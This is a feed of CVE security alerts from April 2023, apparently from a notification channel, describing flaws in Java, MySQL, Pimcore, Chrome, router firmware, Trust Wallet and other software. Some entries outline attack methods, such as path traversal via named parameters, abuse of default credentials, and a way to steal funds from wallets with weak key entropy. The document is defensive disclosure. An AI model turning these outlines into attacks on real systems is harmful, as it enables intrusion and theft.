🚨 CVE-2022-34169The Apache Xalan Java XSLT library is vulnerable to an integer truncation issue when processing malicious XSLT stylesheets. This can be used to corrupt Java class files generated by the internal XSLTC compiler and execute arbitrary Java bytecode. The Apache Xalan Java project is dormant and in the process of being retired. No future releases of Apache Xalan Java to address this issue are expected. Note: Java runtimes (such as OpenJDK) include repackaged copies of Xalan.🎖@cveNotify |
|
| 2023-04-27 18:58:25 |
🚨 CVE-2022-21540Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 7u343, 8u333, 11.0.15.1, 17.0.3.1, 18.0.1.1; Oracle GraalVM Enterprise Edition: 20.3.6, 21.3.2 and 22.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).🎖@cveNotify |
|
| 2023-04-27 18:58:21 |
🚨 CVE-2022-21549Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 17.0.3.1; Oracle GraalVM Enterprise Edition: 21.3.2 and 22.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2023-04-27 18:58:20 |
🚨 CVE-2023-30850Pimcore is an open source data and experience management platform. Prior to version 10.5.21, a SQL Injection vulnerability exists in the admin translations API. Users should update to version 10.5.21 to receive a patch or, as a workaround, or apply the patch manually.🎖@cveNotify |
|
| 2023-04-27 18:58:19 |
🚨 CVE-2023-30852Pimcore is an open source data and experience management platform. Prior to version 10.5.21, the `/admin/misc/script-proxy` API endpoint that is accessible by an authenticated administrator user is vulnerable to arbitrary JavaScript and CSS file read via the `scriptPath` and `scripts` parameters. The `scriptPath` parameter is not sanitized properly and is vulnerable to path traversal attack. Any JavaScript/CSS file from the application server can be read by specifying sufficient number of `../` patterns to go out from the application webroot followed by path of the folder where the file is located in the "scriptPath" parameter and the file name in the "scripts" parameter. The JavaScript file is successfully read only if the web application has read access to it. Users should update to version 10.5.21 to receive a patch or, as a workaround, apply the patch manual.🎖@cveNotify |
|
| 2023-04-27 18:58:15 |
🚨 CVE-2023-29855WBCE CMS 1.5.3 has a command execution vulnerability via admin/languages/install.php.🎖@cveNotify |
|
| 2023-04-27 18:58:14 |
🚨 CVE-2023-2349A vulnerability classified as problematic has been found in SourceCodester Service Provider Management System 1.0. Affected is an unknown function of the file /admin/index.php. The manipulation of the argument page leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-227592.🎖@cveNotify |
|
| 2023-04-27 18:58:13 |
🚨 CVE-2023-2350A vulnerability classified as problematic was found in SourceCodester Service Provider Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /classes/Users.php. The manipulation of the argument id leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-227593 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-27 16:58:38 |
🚨 CVE-2023-21912Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Privileges). Supported versions that are affected are 5.7.41 and prior and 8.0.30 and prior. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-04-27 16:58:36 |
🚨 CVE-2023-21919Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DDL). Supported versions that are affected are 8.0.32 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-04-27 16:58:35 |
🚨 CVE-2023-21920Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.32 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-04-27 16:58:33 |
🚨 CVE-2023-21930Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JSSE). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via TLS to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data as well as unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 7.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N).🎖@cveNotify |
|
| 2023-04-27 16:58:32 |
🚨 CVE-2023-21929Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DDL). Supported versions that are affected are 8.0.32 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.1 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).🎖@cveNotify |
|
| 2023-04-27 16:58:30 |
🚨 CVE-2023-21933Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DDL). Supported versions that are affected are 8.0.32 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-04-27 16:58:29 |
🚨 CVE-2023-21935Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.32 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-04-27 16:58:28 |
🚨 CVE-2023-21938Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.8, 21.3.4 and 22.3.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2023-04-27 16:58:26 |
🚨 CVE-2023-21937Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Networking). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2023-04-27 16:58:25 |
🚨 CVE-2023-21939Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Swing). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2023-04-27 16:58:24 |
🚨 CVE-2023-21940Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Components Services). Supported versions that are affected are 8.0.32 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-04-27 16:58:23 |
🚨 CVE-2023-21946Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.32 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-04-27 16:58:22 |
🚨 CVE-2023-21945Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.32 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-04-27 16:58:20 |
🚨 CVE-2023-21947Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Components Services). Supported versions that are affected are 8.0.32 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-04-27 16:58:19 |
🚨 CVE-2023-21954Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N).🎖@cveNotify |
|
| 2023-04-27 16:58:18 |
🚨 CVE-2023-21953Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Partition). Supported versions that are affected are 8.0.32 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-04-27 16:58:16 |
🚨 CVE-2023-21955Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Partition). Supported versions that are affected are 8.0.32 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-04-27 16:58:15 |
🚨 CVE-2023-21963Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Connection Handling). Supported versions that are affected are 5.7.40 and prior and 8.0.31 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Server. CVSS 3.1 Base Score 2.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L).🎖@cveNotify |
|
| 2023-04-27 16:58:14 |
🚨 CVE-2023-21962Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Components Services). Supported versions that are affected are 8.0.32 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-04-27 16:58:13 |
🚨 CVE-2023-21966Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: JSON). Supported versions that are affected are 8.0.32 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-04-27 14:58:20 |
🚨 CVE-2023-30542OpenZeppelin Contracts is a library for secure smart contract development. The proposal creation entrypoint (`propose`) in `GovernorCompatibilityBravo` allows the creation of proposals with a `signatures` array shorter than the `calldatas` array. This causes the additional elements of the latter to be ignored, and if the proposal succeeds the corresponding actions would eventually execute without any calldata. The `ProposalCreated` event correctly represents what will eventually execute, but the proposal parameters as queried through `getActions` appear to respect the original intended calldata. This issue has been patched in 4.8.3. As a workaround, ensure that all proposals that pass through governance have equal length `signatures` and `calldatas` parameters.🎖@cveNotify |
|
| 2023-04-27 14:58:19 |
🚨 CVE-2023-2340Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore prior to 10.5.21.🎖@cveNotify |
|
| 2023-04-27 14:58:15 |
🚨 CVE-2023-30444IBM Watson Machine Learning on Cloud Pak for Data 4.0 and 4.5 is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. IBM X-Force ID: 253350.🎖@cveNotify |
|
| 2023-04-27 14:58:14 |
🚨 CVE-2023-2331Unquoted Search Path or Element vulnerability in 42Gears Surelock Windows SureLock Service (NixService.Exe) on Windows allows Privilege Escalation, Local Execution of Code.This issue affects Surelock Windows : 2.40.0.🎖@cveNotify |
|
| 2023-04-27 14:58:13 |
🚨 CVE-2023-2338SQL Injection in GitHub repository pimcore/pimcore prior to 10.5.21.🎖@cveNotify |
|
| 2023-04-27 14:58:12 |
🚨 CVE-2023-2339Cross-site Scripting (XSS) - Reflected in GitHub repository pimcore/pimcore prior to 10.5.21.🎖@cveNotify |
|
| 2023-04-27 13:59:11 |
🚨 CVE-2023-1778This vulnerability exists in GajShield Data Security Firewall firmware versions prior to v4.28 (except v4.21) due to insecure default credentials which allows remote attacker to login as superuser by using default username/password via web-based management interface and/or exposed SSH port thereby enabling remote attackers to execute arbitrary commands with administrative/superuser privileges on the targeted systems.The vulnerability has been addressed by forcing the user to change their default password to a new non-default password.🎖@cveNotify |
|
| 2023-04-27 13:59:10 |
🚨 CVE-2023-2327Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore prior to 10.5.21.🎖@cveNotify |
|
| 2023-04-27 13:59:09 |
🚨 CVE-2023-2328Cross-site Scripting (XSS) - Generic in GitHub repository pimcore/pimcore prior to 10.5.21.🎖@cveNotify |
|
| 2023-04-27 10:59:13 |
🚨 CVE-2023-28769The buffer overflow vulnerability in the library “libclinkc.so” of the web server “zhttpd” in Zyxel DX5401-B0 firmware versions prior to V5.17(ABYO.1)C0 could allow a remote unauthenticated attacker to execute some OS commands or to cause denial-of-service (DoS) conditions on a vulnerable device.🎖@cveNotify |
|
| 2023-04-27 10:59:12 |
🚨 CVE-2023-28770The sensitive information exposure vulnerability in the CGI “Export_Log” and the binary “zcmd” in Zyxel DX5401-B0 firmware versions prior to V5.17(ABYO.1)C0 could allow a remote unauthenticated attacker to read the system files and to retrieve the password of the supervisor from the encrypted file.🎖@cveNotify |
|
| 2023-04-27 10:59:11 |
🚨 CVE-2023-2323Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore prior to 10.5.21.🎖@cveNotify |
|
| 2023-04-27 10:59:10 |
🚨 CVE-2023-31290Trust Wallet Core before 3.1.1, as used in the Trust Wallet browser extension before 0.0.183, allows theft of funds because the entropy is 32 bits, as exploited in the wild in December 2022 and March 2023. This occurs because the mt19937 Mersenne Twister takes a single 32-bit value as an input seed, resulting in only four billion possible mnemonics. The affected versions of the browser extension are 0.0.172 through 0.0.182. To steal funds efficiently, an attacker can identify all Ethereum addresses created since the 0.0.172 release, and check whether they are Ethereum addresses that could have been created by this extension. To respond to the risk, affected users need to upgrade the product version and also move funds to a new wallet address.🎖@cveNotify |
|
| 2023-04-27 05:59:25 |
🚨 CVE-2023-24836SUNNET CTMS has vulnerability of path traversal within its file uploading function. An authenticated remote attacker with general user privilege can exploit this vulnerability to upload and execute scripts onto arbitrary directories to perform arbitrary system operation or disrupt service.🎖@cveNotify |
|
| 2023-04-27 05:59:24 |
🚨 CVE-2023-29479Ribose RNP before 0.16.3 may hang when the input is malformed.🎖@cveNotify |
|
| 2023-04-27 05:59:23 |
🚨 CVE-2023-2133Out of bounds memory access in Service Worker API in Google Chrome prior to 112.0.5615.137 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-27 05:59:22 |
🚨 CVE-2023-2134Out of bounds memory access in Service Worker API in Google Chrome prior to 112.0.5615.137 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-27 05:59:18 |
🚨 CVE-2023-2136Integer overflow in Skia in Google Chrome prior to 112.0.5615.137 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-27 05:59:17 |
🚨 CVE-2023-2137Heap buffer overflow in sqlite in Google Chrome prior to 112.0.5615.137 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-04-27 05:59:16 |
🚨 CVE-2023-2004An integer overflow vulnerability was discovered in Freetype in tt_hvadvance_adjust() function in src/truetype/ttgxvar.c.🎖@cveNotify |
|
| 2023-04-27 05:59:15 |
🚨 CVE-2023-2033Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-27 05:59:11 |
🚨 CVE-2021-0878In PVRSRVBridgeServerSyncGetStatus of the PowerVR kernel driver, a missing size check means there is a possible integer overflow that could allow out-of-bounds heap access. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-270399153🎖@cveNotify |
|
| 2023-04-27 05:59:10 |
🚨 CVE-2021-0876In PVRSRVBridgePhysmemNewRamBackedLockedPMR of the PowerVR kernel driver, a missing size check means there is a possible integer overflow that could allow out-of-bounds heap access. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-270400229🎖@cveNotify |
|
| 2023-04-27 05:59:09 |
🚨 CVE-2021-0875In PVRSRVBridgeChangeSparseMem of the PowerVR kernel driver, a missing size check means there is a possible integer overflow that could allow out-of-bounds heap access. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-270400061🎖@cveNotify |
|
| 2023-04-27 05:59:08 |
🚨 CVE-2021-0879In PVRSRVBridgeRGXTDMSubmitTransfer of the PowerVR kernel driver, a missing size check means there is a possible integer overflow that could allow out-of-bounds heap access. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-270397970🎖@cveNotify |
|
| 2023-04-27 05:59:05 |
🚨 CVE-2023-2168The TaxoPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Suggest Terms Title field in versions up to, and including, 3.6.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with Editor+ permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-04-27 05:59:04 |
🚨 CVE-2023-2170The TaxoPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Related Posts functionality in versions up to, and including, 3.6.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with Editor+ permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-04-27 05:59:03 |
🚨 CVE-2023-25619A CWE-754: Improper Check for Unusual or Exceptional Conditions vulnerability exists thatcould cause denial of service of the controller when communicating over the Modbus TCPprotocol. 🎖@cveNotify |
|
| 2023-04-27 05:59:02 |
🚨 CVE-2023-25620A CWE-754: Improper Check for Unusual or Exceptional Conditions vulnerability exists thatcould cause denial of service of the controller when a malicious project file is loaded onto thecontroller by an authenticated user. 🎖@cveNotify |
|
| 2023-04-27 00:59:14 |
🚨 CVE-2023-1697An Improper Handling of Missing Values vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS allows an adjacent, unauthenticated attacker to cause a dcpfe process core and thereby a Denial of Service (DoS). Continued receipt of these specific frames will cause a sustained Denial of Service condition. This issue occurs when a specific malformed ethernet frame is received. This issue affects Juniper Networks Junos OS on QFX10000 Series, PTX1000 Series Series: All versions prior to 19.4R3-S10; 20.1 version 20.1R1 and later versions; 20.2 versions prior to 20.2R3-S6; 20.3 versions prior to 20.3R3-S6; 20.4 versions prior to 20.4R3-S5; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S3; 21.3 versions prior to 21.3R3-S3; 21.4 versions prior to 21.4R3-S1; 22.1 versions prior to 22.1R2-S1, 22.1R3; 22.2 versions prior to 22.2R1-S2, 22.2R2.🎖@cveNotify |
|
| 2023-04-27 00:59:13 |
🚨 CVE-2021-33797Buffer-overflow in jsdtoa.c in Artifex MuJS in versions 1.0.1 to 1.1.1. An integer overflow happens when js_strtod() reads in floating point exponent, which leads to a buffer overflow in the pointer *d.🎖@cveNotify |
|
| 2023-04-27 00:59:12 |
🚨 CVE-2023-27909An Out-Of-Bounds Write Vulnerability in Autodesk® FBX® SDK version 2020 or prior may lead to code execution through maliciously crafted FBX files or information disclosure.🎖@cveNotify |
|
| 2023-04-27 00:59:09 |
🚨 CVE-2023-30548gatsby-plugin-sharp is a plugin for the gatsby framework which exposes functions built on the Sharp image processing library. The gatsby-plugin-sharp plugin prior to versions 5.8.1 and 4.25.1 contains a path traversal vulnerability exposed when running the Gatsby develop server (`gatsby develop`). It should be noted that by default gatsby develop is only accessible via the localhost 127.0.0.1, and one would need to intentionally expose the server to other interfaces to exploit this vulnerability by using server options such as --host 0.0.0.0, -H 0.0.0.0, or the GATSBY_HOST=0.0.0.0 environment variable. Attackers exploiting this vulnerability will have read access to all files within the scope of the server process. A patch has been introduced in gatsby-plugin-sharp@5.8.1 and gatsby-plugin-sharp@4.25.1 which mitigates the issue by ensuring that included paths remain within the project directory. As stated above, by default gatsby develop is only exposed to the localhost 127.0.0.1. For those using the develop server in the default configuration no risk is posed. If other ranges are required, preventing the develop server from being exposed to untrusted interfaces or IP address ranges would mitigate the risk from this vulnerability. Users are non the less encouraged to upgrade to a safe version.🎖@cveNotify |
|
| 2023-04-27 00:59:08 |
🚨 CVE-2023-1109In Phoenix Contacts ENERGY AXC PU Web service an authenticated restricted user of the web frontend can access, read, write and create files throughout the file system using specially crafted URLs via the upload and download functionality of the web service. This may lead to full control of the service.🎖@cveNotify |
|
| 2023-04-27 00:59:07 |
🚨 CVE-2023-30771Incorrect Authorization vulnerability in Apache Software Foundation Apache IoTDB.This issue affects the iotdb-web-workbench component on 0.13.3. iotdb-web-workbench is an optional component of IoTDB, providing a web console of the database.This problem is fixed from version 0.13.4 of iotdb-web-workbench onwards.🎖@cveNotify |
|
| 2023-04-27 00:59:06 |
🚨 CVE-2023-27910A user may be tricked into opening a malicious FBX file that may exploit a stack buffer overflow vulnerability in Autodesk® FBX® SDK 2020 or prior which may lead to code execution.🎖@cveNotify |
|
| 2023-04-27 00:59:02 |
🚨 CVE-2023-27911A user may be tricked into opening a malicious FBX file that may exploit a heap buffer overflow vulnerability in Autodesk® FBX® SDK 2020 or prior which may lead to code execution.🎖@cveNotify |
|
| 2023-04-27 00:59:01 |
🚨 CVE-2022-45876Versions of VISAM VBASE Automation Base prior to 11.7.5 may disclose information if a valid user opens a specially crafted file.🎖@cveNotify |
|
| 2023-04-27 00:59:00 |
🚨 CVE-2023-29552The Service Location Protocol (SLP, RFC 2608) allows an unauthenticated, remote attacker to register arbitrary services. This could allow the attacker to use spoofed UDP traffic to conduct a denial-of-service attack with a significant amplification factor.🎖@cveNotify |
|
| 2023-04-26 22:59:07 |
